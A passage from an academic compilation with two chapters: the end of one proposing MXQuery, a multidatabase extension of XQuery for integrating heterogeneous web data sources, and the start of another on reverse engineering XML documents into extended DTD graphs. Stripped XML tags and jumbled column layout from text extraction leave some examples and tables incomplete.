type of restriction (filter), then a FULL clause produces the UNION of all documents referenced in the query. NULL. The optional NULL clause can be used in association with the ALIAS clause. This clause specifies that a document is nonmandatory for the query result. Consequently, if a data source is unavailable or is not correctly declared in the query (e.g., incorrect path expression), then any declaration to this data source (or some element belonging to it) will be ignored. For example, in a query that contains the MXQuery expression “ALIAS document(‘d2.xml’)/lib $d2 NULL,” the document d2.xml is defined as nonmandatory for the query result. In this case, despite the fact that the data source corresponding to the document d2.xml is unavailable, the query is still processed. In the same way, elements belonging to d2.xml that appear in other declarations of the same query will be suppressed. For instance, the declaration “EQUAL $d1/livro $d2/book IS $p/book” in the same query would be processed as if the element $d2/book was not part of the expression. This makes it possible that schema evolution in local data sources does not imply aborting a query. This property is important to flexible and dynamic environments such as the Web. HIDE. The optional HIDE clause can be used in association with the EQUAL clause. This clause indicates that the elements declared in the EQUAL clause will not appear in the result tree. For example, consider the declaration “EQUAL $d2/book/year $d1/livro/ano IS $p/book/year HIDE” in a given query. The element book/year (result from the resolution of a synonyms conflict) can be referenced in other clauses; however, it will not be part of the result tree. The HIDE clause has precedence over the FULL clause; that is, an element that uses the HIDE clause will not compose the result tree presented even though it has been used by the FULL clause. KEY. The optional KEY clause can be used in association with the EQUAL clause. It indicates that the specified elements represent matching
2480
attributes. This is done by matching properties of distinct documents. For example, in “EQUAL $d1/ livro/@isbn $d2/book/isbn IS $p/book/isbn KEY,” the documents d1.xml and d2.xml produce a new element book/isbn, which behaves as a matching attribute for the elements of the original documents ($d1 and $d2).
NAME(n) Function The NAME(n) function was also incorporated by the XQuery Language (Boag et al., 2003). However, in the XQuery Language, it is only responsible for identifying a data origin. In other words, that function returns the name of the data assigned for n. The MXQuery also incorporates the NAME(.n) function. This function returns the container from the data specified for n. In a hierarchy, the term container represents the upper object to a specific object. For example, in a relational database, a table behaves as the container of attributes, while the database behaves as a table container. It is also possible to nest the NAME(. n) function. For example, NAME(.NAME(.n)) returns the container of the container of n.
Using MXQuery In this section, the applicability of the MXQuery Language is illustrated. Consider that two bookstores (B1 in Brazil and B2 in New Zealand) decide to jointly offer their books on the Web. However, they have decided as well that each bookstore manages its own data source. In other words, local autonomy should be preserved. Now, suppose that the data sources belonging to the bookstores are heterogeneous. Therefore, the idea is to integrate heterogeneous data sources without violating the local autonomy of each data source. For that reason, the bookstores’ managers have decided to use the MDBS technology for integrating the heterogeneous data sources. Each local data-source schema should be represented in XML schema (Elmagarmid et al., 1998). The document d1.xml
Integrating Heterogeneous Data Sources in the Web
(see Appendix A) represents part of a relational database in which data of the bookstore B1 are stored. The document d2.xml represents data of bookstore B2, which are stored in a data source that cannot be characterized as a database system (for example, HTML documents). Query 1. A Brazilian customer wants to search for a title, author, and price from all books in the bookstores B1 and B2. For this query, the ISBN should be used as a matching attribute. A possible MXQuery expression is presented in Figure 1. The execution of Query 1 returns a variable $p that contains elements of documents d1.xml and d2.xml (specified in the ALIAS clauses), each of which contains the subelements, subelements, subelements, and subelements. The result of this query is bound to an element with a root element (because of the declaration of the RETURN clause). It is important to note that the expression “EQUAL $d1/livro/titulo $d2/book/ title IS $p/book/title” specifies that livro/titulo and book/title are synonyms, representing, therefore, the same concept of the real world. This shows that the MXQuery provides necessary support to users in order to define directives for solving semantic conflicts. Note that in the expression “EQUAL ($d1/ livro/preco / 2.98) IS $p/book/price,” a currency conversion is made (in this example, from real to dollar). Therefore, this conversion function solves
a domain conflict existing between both data sources specified in Query 1. Other arithmetical operators can be used to produce any kind of conversion functions. Observe that, the KEY clause is used to specify the matching attribute, in this case, the ISBN. By doing this, it is possible to specify when books that are stored as different objects represent, in fact, the same entity of the real world. In this case, a fusion operation should be applied over those objects. Observe that in Query 1 the equivalence declaration for author and price are in the shortened form. It is important to note that this fact does not cause any impact on the query result. The query result corresponds to an element composed by four subelements. Query 2. A costumer wants to search titles from all books published after 1999 in the databases of the bookstores B1 and B2. For this query, the ISBN should be used as the matching attribute. The MXQuery expression shown in Figure 2 can be used to express this query. Query 2 is similar to Query 1; however, the equivalence declaration of the subelement with the subelement was added, thereby solving a synonyms conflict. Observe that, different from the equivalence declarations of subelements specified in Query 1, the declaration specified in Query 2 does not determine that the subelement composes the result of this query. This is because the HIDE clause was
Figure 1. MXQuery expression for Query 1
2481
Integrating Heterogeneous Data Sources in the Web
Figure 2. MXQuery expression for Query 2
used. The idea is to use the subelement (after the resolution of the synonym conflict) for performing a query filter, which was specified in a WHERE clause. As in the scenario presented in Appendix A, there is a value conflict between two of the elements that should compose the result tree of this query. Two elements have the same ISBN; however, they have the and subelements with distinct values. In document d1.xml, the subelement is equal to 2001. On the other hand, in document d2.xml, the same object has a element with a value equal to 1999. Furthermore, the subelement is presented in Portuguese in document d1.xml, and the subelement is presented in English in document d2.xml. These value conflicts are solved, indicating the data source whose documents’ properties’ contents must prevail over the other one. This indication is made through the declarations order of the participant data sources. In Query 2, the data source specified by the variable $d1 is prioritized; that means, in case of value conflict, its content will be preserved. Due to this fact, the integration result between the data sources d1.xml and d2.xml determines that the value of the subelement must be equal to 2001, and the subelement must appear in the query result in Portuguese.
2482
The use of a NULL clause in Query 2 determines that the nonavailability of the document d2.xml during the query execution does not make the result impracticable. Coincidently, the presented result is the same independent of the availability of d2.xml; however, its nonavailability causes an error if the NULL clause was not specified.
INTEGRATION STRATEGY Since we are proposing the use of the MDBS technology as an integration strategy for heterogeneous data sources, in Figure 3 is depicted an abstract model of the proposed architecture for integrating data stored in heterogeneous, distributed, and autonomous data sources. In Figure 3, the query user interface (QUI) does the mediation between the user and the integration architecture, being responsible for receiving queries and presenting the query results. A user who wishes to access multiple integrated data sources through this architecture must send a query using MXQuery syntax, called global query. After that, global queries are sent to the QM. The main function of this component is to divide a global query into subqueries and to send them to the corresponding data sources.
Integrating Heterogeneous Data Sources in the Web
Figure 3. Integration-mechanism architecture
The query manager is divided into three main components, which are the query processor (QP), location processor (LP), and query postprocessor (QPp). The query processor receives queries expressed in MXQuery syntax, identifies the data sources referenced, simplifies and optimizes the global queries, generates the subqueries, and finally sends these subqueries to the corresponding data sources. The location processor plays an auxiliary role for the query processor since it has to locate the referenced data sources and specify the location errors. Location errors can mean the nonavailability of some referenced data source. Such information is useful in the query-simplification process because the inaccessible data sources must be excluded from the query. The exclusion process of a data source from a query must obey the rules established in the proper query. If it is possible to exclude the data source, then all expressions that refer to the data source excluded should be excluded too. The data sources that can be excluded are identified in the MXQuery syntax using the NULL clause.
Subqueries are sent for XML interfaces, for which they are translated into a native query language and directed to the local data sources corresponding to the XML interfaces. Therefore, a query has an XML interface associated with each local data source. The role played for an XML interface will be argued later. After a local processing, the result of a subquery is sent to the XML interface, where it is translated (for XML format) and directed to the query postprocessor. This component must use the rules established in the original query for conflict resolution. For example, a rule can be established to solve problems of synonyms using the EQUAL expression. Therefore, the user is capable of supplying information to the query postprocessor; thus, the QPp can solve conflict problems using the MXQuery syntax. After the conflict resolution, the QPp must match the result from the diverse subqueries received using the rules established in the original query for result construction. The combined result
2483
Integrating Heterogeneous Data Sources in the Web
of the subqueries is, finally, directed to the query user interface. The source register (SR) is responsible for controlling the connection and disconnection of the participant data sources from the MDBS. This component receives requests from a local data source for participating in the MDBS, registers the physical location of the data sources (URL, uniform resource location), and publishes the local data sources’ schemas. The MDBS repository stores control data of the MDBS, which may include the metadata from the participant data sources, definitions of the MDBS (for example, local data sources or preformatted queries), and the physical location of participant data sources. An XML interface is responsible for mapping the local data sources’ schemas in a common data model (conceptual schema). In the proposed architecture, the conceptual schemas must be represented through XML schemas defined through the XML schema language, a language for the schema definition for XML data (Fallside, 2001). Some proposals for mapping data stored in conventional databases into XML documents have been published and implemented, such as, for example, the XDK for the PL/SQL tool from Oracle (XDK: Oracle XML Developer’s Kit for PL/SQL, 2003).
Figure 4. XML interface
2484
Figure 4 presents the XML interface in more detail. Beside the mapping activity, executed by the mapping-definition component, the XML interface must translate queries expressed in the XML data model to the native data model of the local data source. This task is carried out by the query translator. The last component from the XML interface is the result translator, which executes the inverse function of the query translator since it should present the query result in XML format.
QUERY PROCESSOR The first step executed by the QP is to check the syntax and semantics of the MXQuery expression, and to generate an expression tree (representing the original query). In Figure 5, one can identify two components responsible for executing this first step. The first one makes the syntax verification,
Figure 5. QP-generated products
Integrating Heterogeneous Data Sources in the Web
comparing the syntax analysis tree to the MXQuery grammar. If the query is valid, the second component verifies the existence of the objects in the metadata catalog. Finally, if all objects exist and were correctly specified, an expression tree of the global query is generated. The global optimizer simplifies, to improve performance, the original query by analyzing different logical query plans. Such query plans are obtained by applying transformation rules that were specified by the query language algebra. In a conventional database, the query processor must define the physical query plan to be executed; however, when integrating multiple databases, data availability is not known before the query execution. Such kind of information could change the physical query plan (Ozcan, Nural, Koksal, & Evrendilek, 1997). Furthermore, the MDBS does not have all the statistical information about the data sources; consequently, choosing a better physical query plan before the partial results is a complex task. The subquery generator uses the simplified expression tree to generate XQuery subqueries. At least one XQuery subquery will be generated for each data source. Since XQuery expressions can be simplified by using formal specifications proposed in Draper et al. (2003), there is a twoway flow between the global optimizer and the subquery generator. Thus, the interaction between these two processes defines the generation of five products. 1.
2.
Queried sources: This is a list of all data sources that were referenced in the global query. This information will be used by the location processor, the query processor, and query postprocessor. Optional sources: The MXQuery Language allows classifying the data sources into two distinct groups: mandatory data sources and nonmandatory (optional) data sources. If an optional data source is unavailable, the query is performed any way. In this case, the result
3.
4.
5.
tree could be different. A list of all optional data sources is queried each time when an unavailable data source is detected. If this data source is in the list of optional sources, the query will be performed even though it is unavailable. XQuery Subquery: At least one simplified XQuery subquery will be generated for each data source. Correspondence assertions: A list of all correspondence assertions is generated (Spaccapietra, Parent, & Dupont, 1992). The correspondence assertions define rules for conflict resolution that were extracted from the XQuery query. Document-constructor model: A document is generated that specifies transformations and constructions that should be done in the original elements to obtain the result document.
The idea behind the generation of products from the MXQuery query is permitting the generation of less complex XQuery subqueries. The XML element transformation and integrationconflict resolution are done only by the integration architecture. Thus, the local data sources do not need to execute any effort to present their results. Then, the QPp will use the products originated by the QP to build the expected result. In order to send subqueries to the corresponding data sources, it is necessary to replace the logical reference used to identify the data source with its physical location. The location processor executes this task. It queries the MDBS repository, extracts the required information, and replaces the logical reference. Finally, the QP sends the subqueries to the corresponding XML interface and expects an acknowledgment signal. After an interval UT, if the acknowledgment signal has not arrived at the QP, the QP resends the query. The QP tries to send the subquery during an interval UT’; after that, the QP executes a discard operation
2485
Integrating Heterogeneous Data Sources in the Web
or cancels the query execution according to the following criteria. The QP will execute a discard operation if the unavailable data source is part of the optional source list; references to this data source will be excluded. Thus, integration rules and element construction that reference to such data sources are discarded as well. The QP will perform a cancel operation if the unavailable data source is not part of the optional source list. The QP sends an error message to the QPp and abort messages to the rest of the XML interface.
CONCLUSION This chapter proposes an extension to the XQuery Language, called MXQuery. The key goal is to use MXQuery as a multidatabase language for integrating heterogeneous data sources on the Web. The proposed language provides the necessary support for integrating a variable number of data sources with different degrees of autonomy. MXQuery solves problems of data integration, such as semantics heterogeneity, and copes with incomplete information. Furthermore, an architecture for processing queries over multiple heterogeneous databases available on the Web is described. The idea is to process MXQuery expressions by means of the proposed architecture.
REFERENCES Abiteboul, S., Segoufin, L., & Vianu, V. (2001). Representing and querying XML with incomplete information. Proceedings of the 20th ACM SIGMOD-SIGACT-SIGART Symposium on Principles of Database Systems, (pp. 150-161). Boag, S., Chamberlin, D., Fernadez, M., Florescu, D., Robie, J., Siméon, et al. (2003). XQuery 1.0: An XML query language-Work in progress. Retrieved November 12, 2003, from http://www. w3.org/TR/xquery/
2486
Bouganim, L., Fabret, F., Mohan, C., & Valduriez, P. (2000). A dynamic query processing architecture for data integration. IEEE Data Engineering Bulletin, 23(2), 42-48. Bray, T., Paoli, J., Sperberg-McQueen, C., & Maler, E. (2000). Extensible Markup Language (XML) 1.0 (2nd ed.). Retrieved September 19, 2001, from http://www.w3.org/TR/REC-xml Brayner, A., & Aguiar Moraes Filho, J. de. (2003). Sharing mobile databases in dynamically configurable environments. In J. Eder & M. Missikoff (Eds.), Advanced information systems engineering (pp. 724-737). Klagenfurt, Austria. Chamberlin, D., Robie, J., & Florescu, D. (2000). Quilt: An XML query language for heterogeneous data sources. The World Wide Web and Databases: Third International Workshop WebDB2000, 1-25. Chen, J., DeWitt, D. J., Tian, F., & Wang, Y. (2000). NiagaraCQ: A scalable continuous query system for Internet databases. Proceedings of the 2000 ACM SIGMOD International Conference on Management of Data (pp. 379-390). Das, S., Shuster, K., & Wu, C. (2002). ACQUIRE: Agent-based complex query and information retrieval engine. Proceedings of the 1st International Joint Conference on Autonomous Agents and Multiagent Systems (pp. 631-638). Domenig, R., & Dittrich, K. (2000). A query based approach for integrating heterogeneous data sources. Proceedings of the 9th International Conference on Information and Knowledge Management (pp. 453-460). Draper, D., Fankhauser, P., Fernández, M., Malhotra, A., Rose, K., Rys, et al. (2003). XQuery 1.0 and XPath 2.0 formal semantics (Working draft). Retrieved February 20, 2004, from http://www. w3.org/TR/xquery-semantics/ Elmagarmid, A., Bouguettaya, A., & Benatallah, B. (1998). Interconnecting heterogeneous infor-
TC-2 Working Conference on Data Semantics (pp. 93-115).
Elmagarmid, A., Rusinkiewicz, M., & Shethm, A. (1999). Management of heterogeneous and autonomous database systems. San Francisco: Morgan Kaufman Publishers.
Ozcan, F., Nural, S., Koksal, P., & Evrendilek, C. (1997). Dynamic query optimization in multidatabases. Bulletin of the IEEE Computer Society Technical Committee on Data Engineering, 20(3), 38-45.
Fallside, D. (2001). XML schema part 0: Primer (W3C recommendation). Retrieved September 21, 2001, from http://www.w3.org/TR/xmlschema0/
Özsu, M., & Valduriez, P. (1999). Principles of distributed database systems (2nd ed.). Upper Saddle River, NJ: Prentice-Hall.
Goldman, R., & Widom, J. (2000). WSQ/DSQ: A practical approach for combined querying of databases and the Web. Proceedings of the 2000 ACM SIGMOD International Conference on Management of Data (pp. 285-296).
Robie, J., Chamberlin, D., & Florescu, D. (2000). Quilt: An XML query language. Proceedings of the XML Europe 2000. Retrieved from http:// www.gca.org/papers/xmleurope2000/papers/s0801.html
Grant, J., Litwin, W., Roussopoulos, N., & Sellis, T. (1993). Query languages for relational multidatabases. VLDB Journal, 2, 153-171.
Sattler, K., Conrad, S., & Saake, G. (2000). Adding conflict resolution features to a query language for database federations. Proceedings of the 3rd International Workshop on Engineering Federated Information Systems (pp. 41-52).
Krishnamurthy, R., Litwin, W., & Kent, W. (2001). Languages features for interoperability of databases with schematic discrepancies. ACM SIGMOD Record, 20(2), 40-49. Litwin, W., Abdellatif, A., Zeroual, A., Nicolas, B., & Vigier, P. (1989). MSQL: A multidatabase language. Information Sciences, 49, 59-101. Manolescu, I., Florescu, D., & Kossman, D. (2001). Answering XML queries over heterogeneous data sources. Proceedings of the 27th International Conference on Very Large Databases (pp. 241250). Missier, P., & Rusimkiewicz, M. (1995). Extending a multidatabase manipulation language to resolve schema and data conflicts. Database Applications Semantics: Proceedings of the Sixth IFIP
Spaccapietra, S., Parent, C., & Dupont, Y. (1992). Model independent assertions for integration of heterogeneous schemas. VLDB Journal, 1, 81-126. Tomasic, A., Raschid, L., & Valduriez, P. (1996). Scaling heterogeneous databases and the design of disco. Proceedings of the 16th IEEE International Conference on Distributed Computing Systems (pp. 449-457). XDK: Oracle XML developer’s kit for PL/SQL. (2003). Retrieved October 22, 2003, from http:// otn.oracle.com/tech/xml/xdk_plsql/indesx.html XQuery 1.0 formal semantics. (n.d.). Retrieved from http://www.w3c.org/TR/query-semantics/
2487
Integrating Heterogeneous Data Sources in the Web
Fundamentals of Database Systems Document: d1.xml
Elmasri
Navathe 1994
54.00
Princípios de SBDs Distribuídos
Özsu
013
Valduriez
A First Course in Database Systems Garcia-Mollina
Prentice Hall
Ullman
45.00
Widom
2001
352
Campus
Database System Implementation
110.00
Garcia-Mollina
Document: d2.xml
Ullman
Widom
053
1999 50.00
This work was previously published in Web Data Management Practices: Emerging Techniques and Technologies, edited by A. Vakali and G. Pallis, pp. 199-219, copyright 2007 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
2488
2489
Chapter 8.7
Reverse Engineering from an XML Document into an Extended DTD Graph Herbert Shiu City University of Hong Kong, Hong Kong Joseph Fong City University of Hong Kong, Hong Kong
ABSTRACT The extensible markup language (XML) has become a standard for persistent storage and data interchange via the Internet due to its openness, self-descriptiveness, and flexibility. This article proposes a systematic approach to reverse engineer arbitrary XML documents to their conceptual schema, extended DTD graphs, which are DTD graphs with data semantics. The proposed approach not only determines the structure of the XML document, but also derives candidate data semantics from the XML element instances by treating each XML element instance as a record in a table of a relational database. One application of the determined data semantics is to verify the linkages among elements. Implicit and explicit referential linkages are among XML elements
modeled by the parent-children structure and ID/IDREF(S), respectively. As a result, an arbitrary XML document can be reverse engineered into its conceptual schema in an extended DTD graph format.
INTRODUCTION As the extensible markup language (XML; Bray, Paoli, Sperberg-McQueen, Maler, & Yergeau, 2004) has become the standard document format, the chance that users have to deal with XML documents with different structures is increasing. If the schema of the XML documents in a document type definition (DTD; Bosak, 1998) is given or derived from the XML documents right away (Kay, 1999; Moh, Lim, & Ng, 2000), it is easier
Reverse Engineering from an XML Document into an Extended DTD Graph
to study the contents of the XML documents. However, the formats of these schemas are hard to read and not very user friendly. XML has been the common format for storing and transferring data between software applications and even business parties as most software applications can generate or handle XML documents. For example, a common scenario is that XML documents are generated and based on the data stored in a relational database; there have been various approaches for doing so (Fernandez, Morishima, & Suciu, 2001; Thiran, Estiévenart, Hainaut, & Houben, 2004). The sizes of XML documents that are generated based on the data stored in databases can be very large. Most probably, these documents are stored in a persistent storage for backup purposes as XML is the ideal format that can be processed by any software applications in the future. In order to handle the above scenario, it is possible to treat XML element instances in an XML document as individual entities, and the relationships from the different XML element types can be determined by reverse engineering them for their conceptual models, such as extended DTD graphs with data semantics. As such, users can have a better understanding of the contents of the XML document and further operations with the XML document become possible, such as storing and querying (Deutsch, Fernandez, & Suciu, 1999; Florescu & Kossmann, 1999; Kanne & Moerkotte, 2000). This article proposes several algorithms that analyze XML documents for their conceptual schema. Two main categories of XML documents exist: data centric and narrative. As the contents of narrative XML documents, such as DocBook (Stayton, 2008) documents, are mainly unstructured and their vocabulary is basically static, the necessity of handling them as structured contents and reverse engineering them into conceptual models is far less than that of handling data-centric ones. Therefore, this article will concentrate on data-centric XML documents.
2490
Referential Integrity in XML Documents XML natively supports one referential integrity mechanism, which is the ID/IDREF(S) type of attribute linkages. In every XML document, the value of an ID type attribute appears at most once and the value of the IDREF(S) attribute must refer to one ID type attribute value. An IDREF(S) type attribute can refer to any XML element in the same document, and each XML element can define at most one ID type attribute. Due to the nature of ID/IDREF(S) type attributes in XML documents, relationships among different XML element types can be realized and it is possible to use them to implement data semantics. This article will discuss the various data semantics and the possible ways to implement them. The algorithms presented are based on observations of the common XML document structures: 1.
2.
3.
Due to the nested structure of an XML document (the relationship between a parent element and its child elements), the child elements implicitly refer to their parent element. For an IDREF or IDREFS type attribute, the defining element is referred to the element(s) with an ID type attribute by the referred value. Such linkages are similar to the foreign keys in a relational database. The two associated element types are considered to be linked by an explicit linkage. As an IDREFS type attribute can refer to more than one element, there is a one-to-many cardinality from the referring element type and the referred element type(s).
The schema of an XML document can restrict the order of the XML elements, which may be significant; the order depends on the intentions of the original XML document designer. For example,
Reverse Engineering from an XML Document into an Extended DTD Graph
Table 1. Two equivalent XML documents that can represent the same data DTD
two XML documents with their corresponding DTDs are shown in Table 1. The two XML documents shown in Table 1 are storing the same data, which are the data of two couples. For the first one, its couple elements use the two IDREF type attributes to denote the corresponding husband and wife elements. However, the use of ID/IDREF cannot ensure that a particular husband or wife element is referred by one couple element only. For the second XML document, the DTD restricts the husband and wife elements to exist as a pair. Furthermore, the use of ID type attributes hid and wid ensures any husband and wife element instance must exist in the document at most once.
XML Document
Extended DTD Graph As XML element instances are treated as individual entities, the relationships of the element types are therefore related not only to the structure of the XML document, but also to the linkages of the different types. As such, DTD cannot clearly indicate the relationships. An extended DTD graph for XML is proposed to add data semantics into a DTD graph so that the data semantics can be clearly identified, which is an excellent way of presenting the structure of an XML document. As such, in order to visualize the data semantics determined based on the XML document with its optional schema, it will
2491
Reverse Engineering from an XML Document into an Extended DTD Graph
provide the notations to be used for presenting the various data semantics. This article uses the authors’ notations of the extended DTD graph for presenting the structure and the data semantics of the elements: 1.
2.
3.
The vertexes as squares are drawn on the graph for elements, and vertexes as circles are drawn for the occurrence operators (?, +, and *) and selection operator (|). Attributes and simple elements are omitted from the graph as they specify a particular attribute of their defining and parent elements, respectively. Data semantics, other than one-to-one and one-to-many cardinality relations, are presented in the graph as arrows pointing from the referring element to the referred element with suitable descriptions as legends.
Based on the above criteria, it is possible to consider the ELEMENT declarations only for constructing the extended DTD graph. Three types of ELEMENT declarations can be identified as follows: 1.
An ELEMENT declaration defines subelements only.
2. 3.
An ELEMENT declaration involves subelements and #PCDATA as its contents. An ELEMENT declaration defines #PCDATA as its contents only.
The above three types correspond to the following three examples.
For each ELEMENT declaration of the first type, the content model expression can be tokenized as individual elements, occurrence indicators, and sequence separators (,), and represented as a tree structure with the element name as the root node. For example, the first example above can be visualized as a tree diagram. In Figure 1, the sequence (,) is implied in the diagram. DTDs mostly contain more than one ELEMENT declaration, but each element type can only appear once. Therefore, to construct the complete DTD graph for a DTD, the tree structures of all ELEMENT declarations in a DTD are constructed first and are eventually merged by replacing each subelement node in a tree with the tree structure
Figure 1. A sample extended DTD graph
PARENT
PARENT
,
2492
+
*
+
*
CHILD1
CHILD2
CHILD1
CHILD2
Reverse Engineering from an XML Document into an Extended DTD Graph
of that element. Such merging is repeated until there is only one tree structure or all subelements have been replaced with their corresponding tree structures.
Cardinality and Participation Element types are visualized as rectangles in the graph and a cardinality relationship is presented as an arrow pointing from the referring element type to the referred element type, with a double line and single line for total participation and partial participation, respectively. The cardinality types, including one to one (1/1), one to many (1/m), many to one (m/1), and many to
many (m/m), are shown as legends of the arrows. If the cardinality relationship is implemented as explicit ID/IDREF(S) linkages, the name of the ID type attribute of the referring element is appended to the legend, such as 1/m (parent _ id). To identify explicit linkages from implicit linkages, cardinality relationships due to ID/IDREF(S) type attributes are shown as arrows with curved lines. Table 2 presents the eight possible combinations of arrows and legends.
N-ary Relationship An n-ary relationship is implemented as a particular element type involved in more than two binary
Table 2. The arrows illustrating various cardinalities with participation types Participation Cardinality One to one One to many Many to one Many to many
1/1
1/1
1/m
1/m
m/1
m/1
m/m
m/m
Figure 2. A sample diagram with an n-ary relationship element1 1/m element2
1/m
relation
m/1
element3
2493
Reverse Engineering from an XML Document into an Extended DTD Graph
relationships. To represent such a relationship, a diamond-shaped vertex is used for such element types. Figure 2 presents a sample diagram with an n-ary relationship.
semantics from the XML element instances before further manipulating them.
The Determination of Data Semantics from XML Documents
Aggregation Relationship An aggregation relationship denotes that the involved element types must exist as a unity. In Figure 2, an aggregation exists as the defining characteristic of mandatory participation between parent and child elements. As such, a rectangle is to be drawn enclosing all involved element types.
RELATED WORK In order to have a complete picture of the reasons behind the algorithms for determining various data semantics, this article explains the existing approaches of constructing XML documents, especially those exported from relational databases.
One approach exists that can reverse engineer data semantics from XML documents (Fong & Wong, 2004), but the algorithm maps some predefined templates of document structures to data semantics, and the algorithm can only be implemented with DOM (World Wide Web Consortium [W3C], 2003), which needs to read the entire XML document to the memory and therefore is inappropriate for huge documents. The methodology presented in this article, however, determines basic candidate data semantics from arbitrary XML documents with SAX (W3C, 2004), which is applicable to XML documents of any size. Some of the determined data semantics may not be the intentions of the original writer and need user supervision for verification.
The Implementation of Inheritance among XML Elements
The Determination of XML Schema There is some existing work concerning the extraction of schema, such as DTD, from XML documents (Chidlovskii, 2001; Min, Ahn, & Chung, 2003). The outputs of these algorithms are the schemas that can validate the XML documents. However, the derived schemas provide no semantic interpretation other than the containment structures of the XML documents. The algorithms proposed in this article concern the determination of data semantics from the XML element instances rather than simply XML schema among XML elements. Compared to the approach proposed by Goldman and Widom (1997) that directly manipulates semistructured databases, such as an XML document, the algorithm proposed here provides the user with a clear picture of the data
2494
Schema for object-oriented XML (SOX; W3C, 2005) introduced the idea of element and attribute inheritance, which enables an element to extend another element so that the derived element can have all attributes defined by the base element with its own new attributes. Due to the limitations and low extensibility of DTD (Sahuguet, 2000), XML schema definition (XSD; Sperberg, 2000) is becoming the popular replacement schema of DTD. Unlike DTD, XSD is an XML document itself and can define more restrictive constraints and clear definitions of the XML documents to be validated. In other words, the set of capabilities for defining the structures and data types of XSD are the superset of that of DTD. As such, there has been research and
Reverse Engineering from an XML Document into an Extended DTD Graph
software for converting DTD to XSD (Mello & Heuser, 2001; W3C, 2000). There are other alternative schemas, such as RELAX NG (RELAX NG, 2003) and Schematron (Shanmugasundaram et al., 2008). Lee and Chu (2000a) evaluated six common XML schemas, including DTD and XSD. As the others are not as popular as DTD and XSD, they are not discussed in this article. By constructing a graph by placing vertexes for elements—and the elements that are involved in a parent-child relation, which is defined by ELEMENT declaration in DTD, are connected with edges—it is possible to derive a graphical representation of the DTD that is commonly known as a DTD graph. Up to now, there has been no formal standard for DTD graphs, and various researchers are using their own conventions, as in Klettke, Schneider, and Heuer (2002), Shanmugasundaram et al. (2008), Lu, Sun, Atay, and Fotouhi (2003), and Böttcher and Steinmetz (2003); the graph introduced in Funderburk, Kiernan, Shanmugasundaram, Shekita, and Wei (2002) is the first one that was denoted as a DTD graph. There is a graphical representation of XSD (Fong and Cheung, 2005) that derives an XML conceptual schema of an XML tree model from an XML schema of XSD. Its approach is differ-
ent from this article’s approach, which derives an extended DTD graph from an XML document. As the conventions of most graphs for presenting the structure of an XML document are applicable to different schema languages, the graph is also known as a semantic graph (An, Borgida, & Mylopoulos, 2005). Some researchers proposed other graphical representations of XML schemas, such as the use of UML (unified modeling language; Booch, Christerson, Fuchs, & Koistinen, 1999).
The Application of Extended DTD Graphs A data graph is a DTD in a graph. Zhao and Siau (2007) described DTD as a good common data model when the majority of data sources are XML sources for the interoperability between relational databases and XML databases. Reverse engineering an XML document into a DTD graph is similar to data mining an XML document into a data tree (Zhang, Liu, Ling, Buckner, & Tija, 2006). The former is a database schema while the latter is internal data in tree structure. Trujillo and Luján-Mora (2004) demonstrated that a DTD can be used to define the correct structure and content of an XML document representing
Table 3. A comparison between the proposed and other existing approaches Proposed Approach XML document with optional schema Conceptual schema with data semantics All common data semantics can be deterCompleteness mined. Algorithms can be implemented with a userUser friendlifriendly GUI (graphical user interface), such ness as the prototype. Input Output
Performance
Good
Other Approaches XML document Schema without data semantics Schemas that can validate the XML document can be derived. Commercial products exist that provide a user-friendly GUI. Not available as no mathematical proofs were provided
2495
Reverse Engineering from an XML Document into an Extended DTD Graph
the main conceptual multidimensional model for data warehouses. Compared to the approach proposed by Goldman and Widom (1997) that directly manipulates semistructured databases such as an XML document, the algorithm proposed in this article enables the user to have a clear picture of the data semantics from the XML element instances before further manipulating them. Table 3 provides a comparison between the proposed algorithms and other existing approaches.
leaves; there must be another ELEMENT definition for each of the child elements. It is not mandatory to define the ELEMENT declaration prior to all its child elements, and it is actually uncertain which element is the root element of the corresponding XML documents. The root element of the XML document is defined by the DOCTYPE declaration before the root-element start tag.
REVERSE-ENGINEERING METHODOLOGY
The following subsections provide all possible implementations of various data semantics, some of which are consistent with those proposed by other researchers (Lee, 2000; Lee, Mani, & Chu, 2003).
There are basically two different definitions in a DTD: ELEMENT and ATTLIST. Each ATTLIST definition defines the attributes of a particular element, whereas ELEMENT defines its possible containments. Each ELEMENT definition can be represented in a tree structure with the element name as the root and its child subelements as
Implementations of Various Data Semantics in XML
Cardinalities One-to-many cardinalities can be realized by both explicit and implicit referential linkages. Through
Figure 3. A many-to-one cardinality implemented by an IDREF type attribute ...
2496
Reverse Engineering from an XML Document into an Extended DTD Graph
implicit referential linkages, a parent element can have child elements of the same type, such as < / P U R C H A S E
_
O R D E R > .
The parent element PURCHASE _ ORDER and the child elements PURCHASE _ ORDER _ LINE are implicitly in a one-to-many relationship. If the occurrences of child element PURCHASE _ ORDER _ LINE are at most one for all PURCHASE _ ORDER elements, they are in a one-to-one relationship instead. If the schema of the XML document is given, it can specify the ID/IDREF(S) type attributes. If an XML element defines an IDREF attribute and all such elements refer to the same element type, there is a one-to-many relationship between the referred and referring XML elements. For example, sample DTD and XML documents are shown in Figure 3. For explicit referential linkages, to determine if the cardinality is one to one or one to many, it is necessary to scan the entire XML document. An XML element type may be involved in more than one one-to-many relationship. In other words, all elements of such XML element types define more than one linkage. For example, if an XML element type defines an IDREF(S) type attribute, all elements of such XML element type actually define two linkages: one implicit linkage by the nested structure and one explicit linkage by the IDREF(S) type attribute. If the two linkages are both one-to-many relationships, the two referred element types by such a referring element type can be considered to be in a many-to-many relationship. For example, the XML document in Figure 4 illustrates a many-to-many relationship. For an XML element type that defines two linkages and hence two one-to-many relationships, the two referred XML element types can be considered to be in a many-to-many relationship.
The linkages from the XML elements in an XML document are identified by the referring element name, linkage name, and the referred element name. The algorithm shown in Figure 6 is used to determine the linkages in Table 4. Figure 5 illustrates the meanings of the four attributes. There are eight XML elements in the document and there is only one implicit linkage from them. The values of the above four linkage attributes for such implicit linkage are given in Table 5. According to the combination of the values of the four attributes, it is possible to determine the cardinality data semantics for the involved elements. The rules are shown in Table 6. The algorithm is composed of two passes of parsing of the same XML document. The first pass assigns a synthetic element identity to each XML element in the document and determines all ID type attribute values and their corresponding element types. For the second pass, the XML document is traversed again and the linkages of each XML element are investigated and their attributes are stored. Finally, the stored linkage attributes are consolidated to give the four linkage attributes mentioned above and in Table 4. The algorithm shown in Figure 6 can determine whether the XML document is valid, in particular, whether a nonexisting ID value is referred by an IDREF(S) type attribute. If the XML document is valid, three tables can be obtained: ReferringInfo, ReferredInfo, and ElementNameCount. The key for the former two tables is the composite key (RGE, RDE, L), that is, the 